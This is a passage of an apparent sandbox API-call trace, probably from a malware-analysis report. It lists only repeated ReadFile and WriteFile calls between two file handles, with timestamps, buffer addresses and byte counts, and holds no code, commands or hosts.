lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.808] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.808] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.808] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.809] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.809] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ef, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.810] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.810] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.811] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.811] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.812] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.812] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.813] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.813] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x319, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.814] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.814] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.815] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.815] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.816] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.816] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.817] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.817] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x301, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.818] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.818] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x378, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.818] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.819] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x312, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.819] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.820] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.820] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.821] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.821] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.822] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.822] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.823] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.823] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.823] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.824] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.824] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.825] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.825] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x277, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.826] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.826] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.827] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.827] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x297, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.828] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.828] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x259, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.828] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.829] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x271, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.830] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.830] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.830] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.831] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.831] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.832] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.832] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.833] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.833] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.834] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.834] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.835] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.835] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.836] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.836] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.837] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.837] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.838] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.838] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.839] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ec, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.839] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.840] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ae, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.840] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.841] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.841] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.842] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.842] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.843] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.843] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.844] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.844] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.844] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.845] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.845] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.846] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.846] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.847] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.847] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.848] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.848] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.851] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.852] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.852] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.853] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ae, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.853] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.854] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.854] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.855] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.855] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.856] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2db, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.856] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.857] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, 